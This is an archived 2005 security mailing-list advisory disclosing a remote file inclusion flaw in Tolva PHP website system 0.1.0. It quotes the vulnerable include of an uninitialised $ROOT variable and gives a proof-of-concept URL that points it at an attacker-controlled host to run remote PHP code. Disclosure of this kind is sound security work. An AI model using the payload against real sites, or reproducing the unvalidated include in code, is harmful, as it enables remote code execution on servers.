Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Tolva PHP website system Remote File Include

from [beford] Network Security [Permanent Link]
Subject: Tolva PHP website system Remote File Include
Date: Wed, 21 Dec 2005 02:10:48 -0500 
Script: Tolva PHP website system
Version: 0.1.0
Language: PHP
Official Website: http://sourceforge.net/projects/twebs
Problem: Remote File Include
Discovered by: beford

Description:
============

A complete collection of php scripts that work tightly together to
create a highly customizable, dynamic and module oriented website.

Problem:
========

A remote user can supply a specially crafted URL to cause the target
system to include and execute arbitrary PHP code from a remote
location. A remote user can execute arbitrary PHP code and operating
system commands on the target system with the privileges of the target
web service. The problem is in the file
"/twebs-0.1.0/src/modules/misc/usermods.php". It seems like there are
other files
affected by the same vuln.


<?PHP
$mod_id=$uid;
include("$ROOT/modules/main.php");
?>


The variable $ROOT isn't initialized and the usermods.php file doesn't
validate user-supplied data in this parameter.


Proof of Concept URL:
==================

http://[target]/twebs/modules/misc/usermods.php?ROOT=http://[attacker_url]


Solution:
========

No solution at this time.


Greets:
=======

http://www.odiameporserelite.org/foro/   * I know, 1337 domain name eh? :P

uyx, Zetha, lithyum, stranger, desKrriado, |LINUX|, Amon-Ra, Extremo,
SecretDreams, caffa, Pamela David
Garybay, r0Y, Mafia_Boy, all ASC, icenix, ][GB][, HaCkZaTan,
Apocalypse, Terror_Br, DIM and Puta

http://www.odiameporserelite.org/
irc.gigachat.net #uruguay, #h4ck3rsbr, #IYS, #D.O.M, #MSR
irc.fullnetwork.org #full, #f4kelive, #venezuela, #d.o.m
irc.com.ve #uruguay, #venezuela
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Tolva PHP website system Remote File Include, beford <=
Previous by Date:  Re: Symantec Antivirus Library Remote Heap Overflows, ltr
Next by Date:  [ECHO_ADV_24$2005] Full path disclosure on WordPress < 1.5.2, the_day@echo.or.id
Previous by Thread:  Re: Symantec Antivirus Library Remote Heap Overflows, ltr
Next by Thread:  [Security-Advisories@acs-inc.com: [Full-disclosure] [ACSSEC-2005-11-25-0x1] VMWare Workstation 5.5.0 <= build-18007 G SX Server Variants And Others], Andrew Griffiths
Indexes:  [Date] [Thread] [Top] [All Lists]